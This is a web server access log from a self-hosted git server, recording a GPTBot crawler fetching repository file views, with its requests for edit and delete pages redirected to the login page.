200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/components/Hero.tsx" +[17/Feb/2026:15:34:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/components/ChatBot.tsx" +[17/Feb/2026:15:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/components/ChatBot.tsx" +[17/Feb/2026:15:34:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/.vscode/settings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/settings.json" +[17/Feb/2026:15:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/.vscode/settings.json" +[17/Feb/2026:15:34:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/.vscode/settings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/settings.json" +[17/Feb/2026:15:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/.vscode/settings.json" +[17/Feb/2026:15:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/.vscode/settings.json" [Client 74.7.227.38] [Length 10868] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/settings.json" +[17/Feb/2026:15:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/.vscode/settings.json" [Client 74.7.227.38] [Length 9802] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/settings.json" +[17/Feb/2026:15:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/.vscode/settings.json" [Client 74.7.227.38] [Length 355] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/settings.json" +[17/Feb/2026:15:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/.vscode/settings.json" [Client 74.7.227.38] [Length 889] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/settings.json" +[17/Feb/2026:15:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24289] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11311] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:34:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11309] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:34:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24290] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:34:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fAssetPilot%2flocalpycs%2fstruct.pyc" [Client 74.7.227.38] [Length 20833] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/struct.pyc" +[17/Feb/2026:15:34:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fbuild%2fGoldMonitor%2flocalpycs%2fstruct.pyc" [Client 74.7.227.38] [Length 20849] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" +[17/Feb/2026:15:34:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=closestduedate&state=all" [Client 74.7.227.38] [Length 8481] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=closestduedate&state=open" +[17/Feb/2026:15:34:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/.vscode/settings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/.vscode/settings.json" +[17/Feb/2026:15:34:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/.vscode/settings.json" +[17/Feb/2026:15:34:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/.vscode/settings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/.vscode/settings.json" +[17/Feb/2026:15:34:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/.vscode/settings.json" +[17/Feb/2026:15:34:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog" [Client 74.7.227.38] [Length 84652] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" +[17/Feb/2026:15:34:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/script.js" [Client 74.7.227.38] [Length 14087] [Gzip 4.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js" +[17/Feb/2026:15:34:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:34:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26857] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:34:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9976] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:34:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9966] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:34:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26858] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:34:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9975] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:34:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:34:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:34:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10288] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:34:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 11058] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" +[17/Feb/2026:15:34:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/js/script.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/script.js" +[17/Feb/2026:15:34:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/js/script.js" +[17/Feb/2026:15:34:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/js/script.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/script.js" +[17/Feb/2026:15:34:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/js/script.js" +[17/Feb/2026:15:34:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/assets/js/script.js" [Client 74.7.227.38] [Length 15856] [Gzip 7.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/script.js" +[17/Feb/2026:15:34:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresWatchdog" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" +[17/Feb/2026:15:34:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresWatchdog" +[17/Feb/2026:15:34:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresWatchdog" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" +[17/Feb/2026:15:34:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresWatchdog" +[17/Feb/2026:15:34:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog" [Client 74.7.227.38] [Length 9778] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" +[17/Feb/2026:15:34:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/PostgresWatchdog" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" +[17/Feb/2026:15:34:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/PostgresWatchdog" +[17/Feb/2026:15:34:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10288] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:34:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libmodbus-5.dll" +[17/Feb/2026:15:34:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresWatchdog/libmodbus-5.dll" +[17/Feb/2026:15:34:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/js/script.js" [Client 74.7.227.38] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/script.js" +[17/Feb/2026:15:34:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/js/script.js" [Client 74.7.227.38] [Length 3681] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/script.js" +[17/Feb/2026:15:34:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/assets/js/script.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/assets/js/script.js" +[17/Feb/2026:15:34:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/assets/js/script.js" +[17/Feb/2026:15:34:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/assets/js/script.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/assets/js/script.js" +[17/Feb/2026:15:34:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/assets/js/script.js" +[17/Feb/2026:15:34:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/components/About.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/components/About.tsx" +[17/Feb/2026:15:34:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/components/About.tsx" +[17/Feb/2026:15:34:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/components/Hero.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 